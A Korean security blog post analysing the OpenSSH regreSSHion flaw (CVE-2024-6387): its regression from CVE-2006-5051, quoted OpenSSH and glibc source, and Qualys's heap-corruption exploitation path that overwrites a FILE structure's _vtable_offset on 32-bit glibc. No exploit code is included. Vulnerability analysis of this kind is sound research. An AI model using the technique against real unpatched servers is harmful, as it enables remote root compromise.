Intro#

TOOR 팀 활동을 하며 분석하게된 OpenSSH 원데이 취약점에 관한 글입니다.

CVE-2024-6387은 7월 1일에 공개된 Qualys에서 발견하고 OpenSSH 버전 9.8/9.8p1에서 패치된 취약점입니다. CVE-2024-6387은 CVE-2006-5051의 보안 회귀(Security Regression)로, 패치되었던 취약점이 잘못된 패치로 인해서 재발생한 케이스입니다. CVE-2006-5051의 보안 회귀 취약점이기 때문에 해당 취약점은 “RegreSSHion”이란 이름으로 불리고 있습니다.

두 취약점 모두 glibc를 기반으로둔 리눅스 시스템 프로그램인 OpenSSH의 서버 프로그램에 존재하는 SIGALRM 시그널 핸들러에서 Async-signal-unsafe 함수를 사용하여 발생하게 되는 취약점입니다. 이로인해 레이스 컨디션이 발생할 수 있습니다. 결과적으론 해당 취약점으로 인해 root 권한으로 대상 서버에 대한 RCE가 가능해집니다.

본 글은 선행 연구를 진행하신 다른 연구원분들의 글들을 읽고 제 나름 분석을 진행하며 취약점을 공부하며 이해하고 정리해본 결과로 작성하게된 글입니다. 나름의 분석을 해봤지만 맞지 않는 부분이 있을 수 있으며, 만약 이를 발견하셨을 시 피드백해주시면 적극 반영하도록 하겠습니다. 취약점 및 PoC 분석에 많은 도움이된 자료는 다음과 같습니다.

https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt

Vuln#

CVE-ID : CVE-2024-6387
CWE : CWE-362, CWE-364
영향 받는 버전

취약하지 않은 버전	취약한 버전

Release	Status	Date
< 4.4p1	CVE-2006-5051 또는 CVE-2008-4109에 대한 패치가 적용되지 않았을 경우 취약	2006년 9월 27일 이전
4.4p1 ≤ OpenSSH < 8.5p1	Mitigation 적용으로 취약하지 않음	2006년 9월 27일 ~ 2021년 3월 3일
8.5p1 ≤ OpenSSH < 9.8p1	취약점 재발	2021년 3월 3일 ~ 2024년 7월 1일
≥ 9.8p1	회귀에 대한 패치 적용	2024년 7월 1일 이후

Reference : https://en.wikipedia.org/wiki/RegreSSHion

RCA#

CVE-2024-6387에 대해 알아보기 전 먼저 CVE-2006-5051에 대해서 알아보고 해당 취약점이 어떻게 재발생하게되었는지 알아봅시다.

CVE-2006-5051#

OpenSSH의 코드 중 sshd.c에 존재하는 grace_alarm_handler는 사용자가 로그인 요청을 하고나서 일정 시간이 지나도록 로그인을 하지 않으면 발생하는 SIGALRM 시그널을 처리하는 함수입니다.

grace_alarm_handler는 sshd의 main 함수에서 설정되고 sshd_config 지시어(LoginGraceTime)로 설정된 일정 시간이 지나게되었을 때 발생하는 SIGALRM 시그널을 처리하기 위해 호출됩니다.

다음과 같이 로그인 시도 후 LoginGraceTime이 설정되어있다면 인증 시간 초과(SIGALRM)에 의해 grace_alarm_handler가 호출됩니다.

영상에 나온 OpenSSH 버전은 9.2p로 grace_alarm_handler의 작동을 보여드리기 위해 사용되었습니다.

OpenSSH 4.3 버전의 grace_alarm_handler는 다음과 같이 작성되어있습니다.

1
/*
2
 * Signal handler for the alarm after the login grace period has expired.
3
 */
4
static void
5
grace_alarm_handler(int sig)
6
{
7
  /* XXX no idea how fix this signal handler */
8

9
  if (use_privsep && pmonitor != NULL && pmonitor->m_pid > 0)
10
    kill(pmonitor->m_pid, SIGALRM);
11

12
  /* Log error and exit. */
13
  fatal("Timeout before authentication for %s", get_remote_ipaddr());
14
}

로깅을 위해 fatal 함수를 호출하는 모습을 볼 수 있습니다. fatal 함수는 fatal.c에 다음과 같이 작성되어있습니다.

1
void
2
fatal(const char *fmt,...)
3
{
4
  va_list args;
5
  va_start(args, fmt);
6
  do_log(SYSLOG_LEVEL_FATAL, fmt, args);
7
  va_end(args);
8
  cleanup_exit(255);
9
}

fatal 함수는 다시 로깅을 위해 log.c에 위치한 do_log 함수를 호출합니다. 이제 do_log 코드를 확인해봅시다.

1
void
2
do_log(LogLevel level, const char *fmt, va_list args)
3
{
4
...
5
    syslog(pri, "%.500s", fmtbuf);
6
...
7
  }
8
}

해당 코드에서 syslog를 호출하는 모습을 볼 수 있습니다. 이때 glibc의 syslog는 메모리 버퍼 스트림을 생성하기 위해서 malloc을 호출하고 함수의 끝에서는 해당 메모리를 정리하기 위해서 free함수를 호출합니다. 이때의 malloc과 free는 비동기 시그널에 안전하지 않기 때문에 시그널 처리 함수에서는 호출되어선 안되지만 syslog의 호출로 인해서 취약점이 발생한 상황입니다.

Async-signal-safe function#

Async-signal-safe 함수란 시그널 핸들러 내에서 안전하게 호출할 수 있는 함수를 뜻합니다.

시그널 핸들러에서 호출하는 함수가 async signal safety(비동기 시그널 안전성)이 없을 경우 취약점이 발생할 수 있습니다.

https://stackoverflow.com/questions/3941271/why-are-malloc-and-printf-said-as-non-reentrant

CVE-2006-5051은 async-signal-unsafe 함수를 호출해서 발생합니다. 바로 직접적인 호출은 아니며 위에서 살펴본대로 다음과 같은 과정으로 async-signal-unsafe 함수가 호출됩니다.

이와 같은 SIGALRM 핸들러의 허점을 이용해 malloc/free 함수 처리 중 특정 지점에서의 처리를 중단시키고 malloc/free에 재진입하여 익스플로잇을 성공시킵니다.

CVE-2006-5051 Patch (Incorrect fix)#

위에서 알아본 취약점은 CVE-2006-5051 패치에 의해 다음과 같이 수정되었습니다.

OpenSSH 4.4 버전의 코드는 다음과 같습니다.

먼저 sshd.c에서의 grace_alarm_handler는 다음과 같이 변경되었습니다.

4.3p2

4.4

4.4에선 sigdie를 호출하는 형태로 바뀌었습니다. sigdie는 이전 버전과 동일하게 do_log를 호출합니다.

1
void
2
sigdie(const char *fmt,...)
3
{
4
  va_list args;
5

6
  va_start(args, fmt);
7
  do_log(SYSLOG_LEVEL_FATAL, fmt, args);
8
  va_end(args);
9
  _exit(1);
10
}

하지만 do_log에서 여전히 syslog를 호출하는 모습이 보입니다.

1
...
2

3
void
4
do_log(LogLevel level, const char *fmt, va_list args)
5
{
6
...
7
    syslog(pri, "%.500s", fmtbuf);
8
...
9
}

잘못된 패치가 이루어졌고 해당 취약점은 여전히 존재하는 상태가 됩니다.

CVE-2008-4109 Patch#

앞서 알아본 취약점은 CVE-2008-4109 패치에서 비로소 수정됩니다.

A certain Debian patch for OpenSSH before 4.3p2-9etch3 on etch; before 4.6p1-1 on sid and lenny; and on other distributions such as SUSE uses functions that are not async-signal-safe in the signal handler for login timeouts, which allows remote attackers to cause a denial of service (connection slot exhaustion) via multiple login attempts. NOTE: this issue exists because of an incorrect fix for CVE-2006-5051.

OpenSSH 4.5p1 grace_alarm_handler

1
/*
2
 * Signal handler for the alarm after the login grace period has expired.
3
 */
4
/*ARGSUSED*/
5
static void
6
grace_alarm_handler(int sig)
7
{
8
  if (use_privsep && pmonitor != NULL && pmonitor->m_pid > 0)
9
    kill(pmonitor->m_pid, SIGALRM);
10

11
  /* Log error and exit. */
12
  sigdie("Timeout before authentication for %s", get_remote_ipaddr());
13
}

OpenSSH 4.5p1 sigdie

1
void
2
sigdie(const char *fmt,...)
3
{
4
#ifdef DO_LOG_SAFE_IN_SIGHAND
5
  va_list args;
6

7
  va_start(args, fmt);
8
  do_log(SYSLOG_LEVEL_FATAL, fmt, args);
9
  va_end(args);
10
#endif
11
  _exit(1);
12
}

grace_alarm_handler에서 호출되는 sigdie에는 전처리 코드가 삽입되어 DO_LOG_SAFE_IN_SIGHAND를 정의하지 않는이상 do_log를 호출하는 일은 없어졌습니다.

CVE-2024-6387 (RegreSSHion)#

앞서 살펴본 취약점인 CVE-2006-5051과 CVE-2008-4109는 위에서 적용된 #ifdef DO_LOG_SAFE_IN_SIGHAND가 실수로 제거되어 commit 752250c(OpenSSH 8.5p1)에 의해서 부활하게됩니다.

코드가 어떻게 바뀌었는지 확인해봅시다.

grace_alarm_handler

1
/*
2
 * Signal handler for the alarm after the login grace period has expired.
3
 */
4
/*ARGSUSED*/
5
static void
6
grace_alarm_handler(int sig)
7
{
8
  if (use_privsep && pmonitor != NULL && pmonitor->m_pid > 0)
9
    kill(pmonitor->m_pid, SIGALRM);
10

11
  /*
12
   * Try to kill any processes that we have spawned, E.g. authorized
13
   * keys command helpers.
14
   */
15
  if (getpgid(0) == getpid()) {
16
    ssh_signal(SIGTERM, SIG_IGN);
17
    kill(0, SIGTERM);
18
  }
19

20
  /* XXX pre-format ipaddr/port so we don't need to access active_state */
21
  /* Log error and exit. */
22
  sigdie("Timeout before authentication for %s port %d",
23
      ssh_remote_ipaddr(the_active_state),
24
      ssh_remote_port(the_active_state));
25
}

여기서 sigdie는 매크로로 sshsigdie로 확장됩니다.

1
#define sigdie(...)    sshsigdie(__FILE__, __func__, __LINE__, 0, SYSLOG_LEVEL_ERROR, NULL, __VA_ARGS__)

sshsigdie는 다음과 같이 정의되어있습니다. 이때 sshsigdie는 sshlogv를 호출합니다.

1
void
2
sshsigdie(const char *file, const char *func, int line, int showfunc,
3
    LogLevel level, const char *suffix, const char *fmt, ...)
4
{
5
  va_list args;
6

7
  va_start(args, fmt);
8
  sshlogv(file, func, line, showfunc, SYSLOG_LEVEL_FATAL,
9
      suffix, fmt, args);
10
  va_end(args);
11
  _exit(1);
12
}

결과적으로 sshlogv는 그전에 패치로 호출되지 않게했던 do_log를 다시 호출하게됩니다.

1
void
2
sshlogv(const char *file, const char *func, int line, int showfunc,
3
    LogLevel level, const char *suffix, const char *fmt, va_list args)
4
{
5
  char tag[128], fmt2[MSGBUFSIZ + 128];
6
  int forced = 0;
7
  const char *cp;
8
  size_t i;
9

10
  snprintf(tag, sizeof(tag), "%.48s:%.48s():%d",
11
      (cp = strrchr(file, '/')) == NULL ? file : cp + 1, func, line);
12
  for (i = 0; i < nlog_verbose; i++) {
13
    if (match_pattern_list(tag, log_verbose[i], 0) == 1) {
14
      forced = 1;
15
      break;
16
    }
17
  }
18

19
  if (log_handler == NULL && forced)
20
    snprintf(fmt2, sizeof(fmt2), "%s: %s", tag, fmt);
21
  else if (showfunc)
22
    snprintf(fmt2, sizeof(fmt2), "%s: %s", func, fmt);
23
  else
24
    strlcpy(fmt2, fmt, sizeof(fmt2));
25

26
  do_log(file, func, line, level, forced, suffix, fmt2, args);
27
}

do_log는 여전히 syslog를 호출하고 있으며 glibc의 syslog는 여전히 비동기 시그널에 대해 안전하지 않기 때문에 보안 회귀가 발생합니다.

1
static void
2
do_log(const char *file, const char *func, int line, LogLevel level,
3
    int force, const char *suffix, const char *fmt, va_list args)
4
{
5
...
6
    syslog(pri, "%.500s", fmtbuf);
7
...
8
}

이로인해 해당 패치가 도입된 8.5p1부터 9.8p1 패치가 적용되기 이전까지 glibc-based 리눅스 시스템에서 취약점이 발생하게 됩니다.

https://upload.wikimedia.org/wikipedia/commons/8/83/Resultant.png

Exploit#

본 취약점을 제보한 Qualys는 위 취약점(CVE-2024-6387)의 악용방법을 32bit glibc기반의 리눅스에서 입증했습니다. 또한 다른 버전에서도 악용 가능 지점을 찾아 특정 버전에 대한 악용 가능성을 연구를 진행했습니다.

연구 개요는 다음과 같습니다.

SSH-2.0-OpenSSH_3.4p1 Debian 1:3.4p1-1.woody.3 (Debian 3.0r6, from 2005)#

DSA의 공개 키 파싱 지점에서 호출되는 free를 취약점을 이용해 중간에 처리를 중단시키고, 완전한 처리가 이루어지지 않은 heap chunk에 대해 grace_alarm_handler에 의해 호출되는 free를 통해 공격을 수행합니다.

해당 공격을 성공시키기위해 600초의 로그인 유예 시간 동안 10개의 연결(MaxStartups)을 수용할 경우 약 10,000번의 시도가 필요하며 원격 루트 쉘을 얻기 위해 평균적으로 약 1주일 정도가 소요됩니다.

SSH-2.0-OpenSSH_4.2p1 Debian-7ubuntu3 (Ubuntu 6.06.1, from 2006)#

해당 버전의 연구에선 CVE-2006-5051에서 언급된 GSSAPI를 GSSAPI 기능은 기본적으로 활성화되어있지 않기 때문에 취약점을 악용할 포인트로 사용하지 않고 기본적으로 활성화된 PAM 기능을 이용합니다.

해당 공격을 성공시키기위해 120초의 로그인 유예 시간 동안 10개의 연결(MaxStartups)을 수용할 경우 약 10,000번의 시도가 필요하며 원격 루트 쉘을 얻기 위해 약 1~2일 정도가 소요됩니다.

SSH-2.0-OpenSSH_9.2p1 Debian-2.+deb12u2 (Debian 12.5.0 from 2024)#

🧪 아래 서술된 Exploit은 _vtable_offset을 사용하지 않는 경우 _IO_wfile_underflow의 유도가 불가능하기때문에 glibc 32bit에서만 유효합니다.

⁉️

다음 glibc-2.36의 소스 코드의 주석을 확인해봅시다.

libioP.h

1
/* Setting this macro to 1 enables the use of the _vtable_offset bias
2
   in _IO_JUMPS_FUNCS, below.  This is only needed for new-format
3
   _IO_FILE in libc that must support old binaries (see oldfileops.c).  */
4
#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_1) && !defined _IO_USE_OLD_IO_FILE
5
# define _IO_JUMPS_OFFSET 1
6
#else
7
# define _IO_JUMPS_OFFSET 0
8
#endif

위와 같은 경우 컴파일 설정에 따라 _IO_JUMPS_OFFSET을 1로 만들어 활성화하거나 0으로 만들어 일부 매크로를 다르게 만들 수 있습니다.

이에따라 다음과 같은 매크로에 차이가 생깁니다.

1
#if _IO_JUMPS_OFFSET
2
# define _IO_JUMPS_FUNC(THIS) \
3
  (IO_validate_vtable                                                   \
4
   (*(struct _IO_jump_t **) ((void *) &_IO_JUMPS_FILE_plus (THIS)  \
5
           + (THIS)->_vtable_offset)))
6
# define _IO_JUMPS_FUNC_UPDATE(THIS, VTABLE)        \
7
  (*(const struct _IO_jump_t **) ((void *) &_IO_JUMPS_FILE_plus (THIS)  \
8
          + (THIS)->_vtable_offset) = (VTABLE))
9
# define _IO_vtable_offset(THIS) (THIS)->_vtable_offset
10
#else
11
# define _IO_JUMPS_FUNC(THIS) (IO_validate_vtable (_IO_JUMPS_FILE_plus (THIS)))
12
# define _IO_JUMPS_FUNC_UPDATE(THIS, VTABLE) \
13
  (_IO_JUMPS_FILE_plus (THIS) = (VTABLE))
14
# define _IO_vtable_offset(THIS) 0
15
#endif

위에서 본 _IO_JUMPS_OFFSET을 0으로 만든다면 설정에 의해 _IO_JUMPS_FUNC에서 _vtable_offset 필드를 사용하지 않게되고 이로인해서 공격이 통하지 않을 수 있습니다.

이는 원 연구글에도 나와있으며 따라서 아래에 설명하는 공격은 i386 glibc에만 해당하게됩니다.

Eventually, we devised the following technique (which seems to be specific to the i386 glibc — the amd64 glibc does not seem to use _vtable_offset at all):

— [접은글의 끝입니다] —

해당 버전의 연구에선 syslog를 호출하는 점을 이용합니다. PoC에선 현재 환경에서의 취약성을 종합해서 악용하기 때문에 자세히 알아봅시다.

연구에 사용된 Debian은 i386에 경우 glibc(2.36)가 항상 0xb7200000 또는 0xb7400000에 매핑되기 때문에 절반의 확률로 PIE를 무력화 시킬 수 있습니다.

앞서 알아본 순서로 syslog가 grace_alarm_handler에 의해서 호출됩니다.

연구에 사용된 Debian버전의 glibc(2.36)는 단일 스레드 환경에대한 락을 진행하지 않기 때문에 취약점을 성공적으로 악용할 수 있습니다.

이를 이용해 malloc 호출을 SIGALRM을 통해 중간에 중단시킨 후 SIGALRM에서 사용하는 malloc을 통해 완전히 처리되지 않은 heap chunk를 악용합니다.

해당 공격을 성공시키위해 120초의 로그인 유예 시간 동안 100개의 연결(MaxStartups)을 수용할 경우 원격 루트 쉘을 얻기 위해 약 6~8시간이 소요됩니다.

glibc 2.36에서 syslog에서는 다음과 같은 흐름으로 fopen을 호출해 FILE 구조체를 만들고 있습니다.

/misc/syslog.c:__syslog,__vsyslog_internal

```c /* * syslog, vsyslog -- * print message on log file; output is intended for syslogd(8). */ void __syslog (int pri, const char *fmt, ...) { va_list ap;

va_start (ap, fmt); __vsyslog_internal (pri, fmt, ap, 0); va_end (ap); } ldbl_hidden_def (__syslog, syslog) ldbl_strong_alias (__syslog, syslog)

void __vsyslog_internal (int pri, const char *fmt, va_list ap, unsigned int mode_flags) { … struct tm *now_tmp = __localtime64_r (&now, &now_tm); … }

1
</div>
2
</details>
3
<details>
4
<summary>/time/localtime.c:__localtime64_r</summary>
5
<div markdown="1">
6
```c
7
/* Return the `struct tm' representation of *T in local time,
8
   using *TP to store the result.  */
9
struct tm *
10
__localtime64_r (const __time64_t *t, struct tm *tp)
11
{
12
  return __tz_convert (*t, 1, tp);
13
}

/time/tzset.c:__tz_convert,tzset_internal

```c /* Return the `struct tm' representation of TIMER in the local timezone. Use local time if USE_LOCALTIME is nonzero, UTC otherwise. */ struct tm * __tz_convert (__time64_t timer, int use_localtime, struct tm *tp) { ... /* Update internal database according to current TZ setting. POSIX.1 8.3.7.2 says that localtime_r is not required to set tzname. This is a good idea since this allows at least a bit more parallelism. */ tzset_internal (tp == &_tmbuf && use_localtime); ... } ... /* Interpret the TZ envariable. */ static void tzset_internal (int always) { ... /* Try to read a data file. */ __tzfile_read (tz, 0, NULL); ... } ```

/time/tzfile.c:__tzfile_read

```c void __tzfile_read (const char *file, size_t extra, char **extrap) { ... /* Note the file is opened with cancellation in the I/O functions disabled and if available FD_CLOEXEC set. */ f = fopen (file, "rce"); if (f == NULL) goto ret_free_transitions; ... read_again: if (__builtin_expect (__fread_unlocked ((void *) &tzhead, sizeof (tzhead), 1, f) != 1, 0) || memcmp (tzhead.tzh_magic, TZ_MAGIC, sizeof (tzhead.tzh_magic)) != 0) goto lose; } ```

위와 같은 흐름에 의해서 FILE 구조체가 힙 메모리에 생성됩니다.

취약점을 이용하여 특정 힙 청크를 겹치게 만든 후 이를 덮어쓰는 과정으로 공격을 진행합니다.

보고서에 나온 내용에 따르면 힙 손상을 통해 __tzfile_read()에서 할당된 FILE 구조체의 _vtable_offset 필드 덮어써 함수 포인터에 의해 호출되는 함수를 임의로 조작하여 원하는 명령어를 실행할 수 있게됩니다.

1
/* The tag name of this struct is _IO_FILE to preserve historic
2
   C++ mangled names for functions taking FILE* arguments.
3
   That name should not be used in new code.  */
4
struct _IO_FILE
5
{
6
...
7
  signed char _vtable_offset;
8
...
9
};

이렇게 오염된 메타데이터는 위 코드에서 살펴본 __tzfile_read에서 __fread_unlocked를 호출하는 과정에서 원하는 코드를 실행할 수 있게 만듭니다.

__fread_unlocked 함수는 다음과 같은 호출 흐름을 갖습니다.

libio/iofread_u.c:_IO_jump_t

```c struct _IO_jump_t { JUMP_FIELD(size_t, __dummy); JUMP_FIELD(size_t, __dummy2); JUMP_FIELD(_IO_finish_t, __finish); JUMP_FIELD(_IO_overflow_t, __overflow); JUMP_FIELD(_IO_underflow_t, __underflow); JUMP_FIELD(_IO_underflow_t, __uflow); JUMP_FIELD(_IO_pbackfail_t, __pbackfail); /* showmany */ JUMP_FIELD(_IO_xsputn_t, __xsputn); JUMP_FIELD(_IO_xsgetn_t, __xsgetn); JUMP_FIELD(_IO_seekoff_t, __seekoff); JUMP_FIELD(_IO_seekpos_t, __seekpos); JUMP_FIELD(_IO_setbuf_t, __setbuf); JUMP_FIELD(_IO_sync_t, __sync); JUMP_FIELD(_IO_doallocate_t, __doallocate); JUMP_FIELD(_IO_read_t, __read); JUMP_FIELD(_IO_write_t, __write); JUMP_FIELD(_IO_seek_t, __seek); JUMP_FIELD(_IO_close_t, __close); JUMP_FIELD(_IO_stat_t, __stat); JUMP_FIELD(_IO_showmanyc_t, __showmanyc); JUMP_FIELD(_IO_imbue_t, __imbue); }; ```

libio/iofread_u.c:__fread_unlocked

```c size_t __fread_unlocked (void *buf, size_t size, size_t count, FILE *fp) { size_t bytes_requested = size * count; size_t bytes_read; CHECK_FILE (fp, 0); if (bytes_requested == 0) return 0; bytes_read = _IO_sgetn (fp, (char *) buf, bytes_requested); return bytes_requested == bytes_read ? count : bytes_read / size; } ```

libio/genops.c:_IO_sgetn

```c size_t _IO_sgetn (FILE *fp, void *data, size_t n) { /* FIXME handle putback buffer here! */ return _IO_XSGETN (fp, data, n); } libc_hidden_def (_IO_sgetn) ```

libio/libioP.h:_IO_XSGETN(FP, DATA, N), _IO_WXSGETN(FP, DATA, N)

```c /* The 'xsgetn' hook reads upto N characters into buffer DATA. Returns the number of character actually read. It matches the streambuf::xsgetn virtual function. */ typedef size_t (*_IO_xsgetn_t) (FILE *FP, void *DATA, size_t N); #define _IO_XSGETN(FP, DATA, N) JUMP2 (__xsgetn, FP, DATA, N) #define _IO_WXSGETN(FP, DATA, N) WJUMP2 (__xsgetn, FP, DATA, N) ```

libio/fileops.c:_IO_file_xsgetn

```c size_t _IO_file_xsgetn (FILE *fp, void *data, size_t n) { size_t want, have; ssize_t count; char *s = data;

want = n;

if (fp->_IO_buf_base == NULL) { /* Maybe we already have a push back pointer. */ if (fp->_IO_save_base != NULL) { free (fp->_IO_save_base); fp->_flags &= ~_IO_IN_BACKUP; } _IO_doallocbuf (fp); }

while (want > 0) { have = fp->_IO_read_end - fp->_IO_read_ptr; if (want <= have) { memcpy (s, fp->_IO_read_ptr, want); fp->_IO_read_ptr += want; want = 0; } else { if (have > 0) { s = __mempcpy (s, fp->_IO_read_ptr, have); want -= have; fp->_IO_read_ptr += have; }

1
  /* Check for backup and repeat */
2
  if (_IO_in_backup (fp))
3
    {
4
      _IO_switch_to_main_get_area (fp);
5
      continue;
6
    }
7

8
  /* If we now want less than a buffer, underflow and repeat
9
     the copy.  Otherwise, _IO_SYSREAD directly to
10
     the user buffer. */
11
  if (fp->_IO_buf_base
12
      && want < (size_t) (fp->_IO_buf_end - fp->_IO_buf_base))
13
    {
14
      if (__underflow (fp) == EOF)
15
  break;
16

17
      continue;
18
    }
19

20
  /* These must be set before the sysread as we might longjmp out
21
     waiting for input. */
22
  _IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);
23
  _IO_setp (fp, fp->_IO_buf_base, fp->_IO_buf_base);
24

25
  /* Try to maintain alignment: read a whole number of blocks.  */
26
  count = want;
27
  if (fp->_IO_buf_base)
28
    {
29
      size_t block_size = fp->_IO_buf_end - fp->_IO_buf_base;
30
      if (block_size >= 128)
31
  count -= want % block_size;
32
    }
33

34
  count = _IO_SYSREAD (fp, s, count);
35
  if (count <= 0)
36
    {
37
      if (count == 0)
38
  fp->_flags |= _IO_EOF_SEEN;
39
      else
40
  fp->_flags |= _IO_ERR_SEEN;
41

42
      break;
43
    }
44

45
  s += count;
46
  want -= count;
47
  if (fp->_offset != _IO_pos_BAD)
48
    _IO_pos_adjust (fp->_offset, count);
49
}
50
}

return n - want; } libc_hidden_def (_IO_file_xsgetn)

1
</div>
2
</details>
3

4
<details>
5
<summary>libio/genops.c</summary>
6
<div markdown="1">
7
```c
8
int
9
__underflow (FILE *fp)
10
{
11
  if (_IO_vtable_offset (fp) == 0 && _IO_fwide (fp, -1) != -1)
12
    return EOF;
13

14
  if (fp->_mode == 0)
15
    _IO_fwide (fp, -1);
16
  if (_IO_in_put_mode (fp))
17
    if (_IO_switch_to_get_mode (fp) == EOF)
18
      return EOF;
19
  if (fp->_IO_read_ptr < fp->_IO_read_end)
20
    return *(unsigned char *) fp->_IO_read_ptr;
21
  if (_IO_in_backup (fp))
22
    {
23
      _IO_switch_to_main_get_area (fp);
24
      if (fp->_IO_read_ptr < fp->_IO_read_end)
25
  return *(unsigned char *) fp->_IO_read_ptr;
26
    }
27
  if (_IO_have_markers (fp))
28
    {
29
      if (save_for_backup (fp, fp->_IO_read_end))
30
  return EOF;
31
    }
32
  else if (_IO_have_backup (fp))
33
    _IO_free_backup_area (fp);
34
  return _IO_UNDERFLOW (fp);
35
}
36
libc_hidden_def (__underflow)

libio/libioP.h:_IO_UNDERFLOW(FP),_IO_WUNDERFLOW(FP)

```c /* The 'underflow' hook tries to fills the get buffer. It returns the next character (as an unsigned char) or EOF. The next character remains in the get buffer, and the get position is not changed. It matches the streambuf::underflow virtual function. */ typedef int (*_IO_underflow_t) (FILE *); #define _IO_UNDERFLOW(FP) JUMP0 (__underflow, FP) #define _IO_WUNDERFLOW(FP) WJUMP0 (__underflow, FP) ```

여기서 _vtable_offset멤버를 덮어 오프셋에 의해 호출되는 함수를 _IO_file_underflow 대신 _IO_wfile_underflow를 호출하게 만듭니다.

libio/fileops.c:_IO_file_jumps

```c const struct _IO_jump_t _IO_file_jumps libio_vtable = { JUMP_INIT_DUMMY, JUMP_INIT(finish, _IO_file_finish), JUMP_INIT(overflow, _IO_file_overflow), JUMP_INIT(underflow, _IO_file_underflow), JUMP_INIT(uflow, _IO_default_uflow), JUMP_INIT(pbackfail, _IO_default_pbackfail), JUMP_INIT(xsputn, _IO_file_xsputn), JUMP_INIT(xsgetn, _IO_file_xsgetn), JUMP_INIT(seekoff, _IO_new_file_seekoff), JUMP_INIT(seekpos, _IO_default_seekpos), JUMP_INIT(setbuf, _IO_new_file_setbuf), JUMP_INIT(sync, _IO_new_file_sync), JUMP_INIT(doallocate, _IO_file_doallocate), JUMP_INIT(read, _IO_file_read), JUMP_INIT(write, _IO_new_file_write), JUMP_INIT(seek, _IO_file_seek), JUMP_INIT(close, _IO_file_close), JUMP_INIT(stat, _IO_file_stat), JUMP_INIT(showmanyc, _IO_default_showmanyc), JUMP_INIT(imbue, _IO_default_imbue) }; libc_hidden_data_def (_IO_file_jumps) ```

libio/wfileops.c:_IO_wfile_jumps

```c const struct _IO_jump_t _IO_wfile_jumps libio_vtable = { JUMP_INIT_DUMMY, JUMP_INIT(finish, _IO_new_file_finish), JUMP_INIT(overflow, (_IO_overflow_t) _IO_wfile_overflow), JUMP_INIT(underflow, (_IO_underflow_t) _IO_wfile_underflow), JUMP_INIT(uflow, (_IO_underflow_t) _IO_wdefault_uflow), JUMP_INIT(pbackfail, (_IO_pbackfail_t) _IO_wdefault_pbackfail), JUMP_INIT(xsputn, _IO_wfile_xsputn), JUMP_INIT(xsgetn, _IO_file_xsgetn), JUMP_INIT(seekoff, _IO_wfile_seekoff), JUMP_INIT(seekpos, _IO_default_seekpos), JUMP_INIT(setbuf, _IO_new_file_setbuf), JUMP_INIT(sync, (_IO_sync_t) _IO_wfile_sync), JUMP_INIT(doallocate, _IO_wfile_doallocate), JUMP_INIT(read, _IO_file_read), JUMP_INIT(write, _IO_new_file_write), JUMP_INIT(seek, _IO_file_seek), JUMP_INIT(close, _IO_file_close), JUMP_INIT(stat, _IO_file_stat), JUMP_INIT(showmanyc, _IO_default_showmanyc), JUMP_INIT(imbue, _IO_default_imbue) }; libc_hidden_data_def (_IO_wfile_jumps) ```

libio/fileops.c:_IO_new_file_underflow

```c int _IO_new_file_underflow (FILE *fp) { ssize_t count;

/* C99 requires EOF to be “sticky”. */ if (fp->_flags & _IO_EOF_SEEN) return EOF;

if (fp->_flags & _IO_NO_READS) { fp->_flags |= _IO_ERR_SEEN; __set_errno (EBADF); return EOF; } if (fp->_IO_read_ptr < fp->_IO_read_end) return *(unsigned char *) fp->_IO_read_ptr;

if (fp->_IO_buf_base == NULL) { /* Maybe we already have a push back pointer. */ if (fp->_IO_save_base != NULL) { free (fp->_IO_save_base); fp->_flags &= ~_IO_IN_BACKUP; } _IO_doallocbuf (fp); }

/* FIXME This can/should be moved to genops ?? / if (fp->_flags & (_IO_LINE_BUF|_IO_UNBUFFERED)) { / We used to flush all line-buffered stream. This really isn’t required by any standard. My recollection is that traditional Unix systems did this for stdout. stderr better not be line buffered. So we do just that here explicitly. —drepper */ _IO_acquire_lock (stdout);

1
  if ((stdout->_flags & (_IO_LINKED | _IO_NO_WRITES | _IO_LINE_BUF))
2
  == (_IO_LINKED | _IO_LINE_BUF))
3
_IO_OVERFLOW (stdout, EOF);
4

5
  _IO_release_lock (stdout);
6
}

_IO_switch_to_get_mode (fp);

/* This is very tricky. We have to adjust those pointers before we call _IO_SYSREAD () since we may longjump () out while waiting for input. Those pointers may be screwed up. H.J. */ fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_buf_base; fp->_IO_read_end = fp->_IO_buf_base; fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end = fp->_IO_buf_base;

count = _IO_SYSREAD (fp, fp->_IO_buf_base, fp->_IO_buf_end - fp->_IO_buf_base); if (count <= 0) { if (count == 0) fp->_flags |= _IO_EOF_SEEN; else fp->_flags |= _IO_ERR_SEEN, count = 0; } fp->_IO_read_end += count; if (count == 0) { /* If a stream is read to EOF, the calling application may switch active handles. As a result, our offset cache would no longer be valid, so unset it. */ fp->_offset = _IO_pos_BAD; return EOF; } if (fp->_offset != _IO_pos_BAD) _IO_pos_adjust (fp->_offset, count); return *(unsigned char *) fp->_IO_read_ptr; } libc_hidden_ver (_IO_new_file_underflow, _IO_file_underflow)

1
</div>
2
</details>
3

4
<details>
5
<summary>libio/wfileops.c:_IO_wfile_underflow</summary>
6
<div markdown="1">
7
```c
8
wint_t
9
_IO_wfile_underflow (FILE *fp)
10
{
11
  struct _IO_codecvt *cd;
12
  enum __codecvt_result status;
13
  ssize_t count;
14

15
  /* C99 requires EOF to be "sticky".  */
16
  if (fp->_flags & _IO_EOF_SEEN)
17
    return WEOF;
18

19
  if (__glibc_unlikely (fp->_flags & _IO_NO_READS))
20
    {
21
      fp->_flags |= _IO_ERR_SEEN;
22
      __set_errno (EBADF);
23
      return WEOF;
24
    }
25
  if (fp->_wide_data->_IO_read_ptr < fp->_wide_data->_IO_read_end)
26
    return *fp->_wide_data->_IO_read_ptr;
27

28
  cd = fp->_codecvt;
29

30
  /* Maybe there is something left in the external buffer.  */
31
  if (fp->_IO_read_ptr < fp->_IO_read_end)
32
    {
33
      /* There is more in the external.  Convert it.  */
34
      const char *read_stop = (const char *) fp->_IO_read_ptr;
35

36
      fp->_wide_data->_IO_last_state = fp->_wide_data->_IO_state;
37
      fp->_wide_data->_IO_read_base = fp->_wide_data->_IO_read_ptr =
38
  fp->_wide_data->_IO_buf_base;
39
      status = __libio_codecvt_in (cd, &fp->_wide_data->_IO_state,
40
           fp->_IO_read_ptr, fp->_IO_read_end,
41
           &read_stop,
42
           fp->_wide_data->_IO_read_ptr,
43
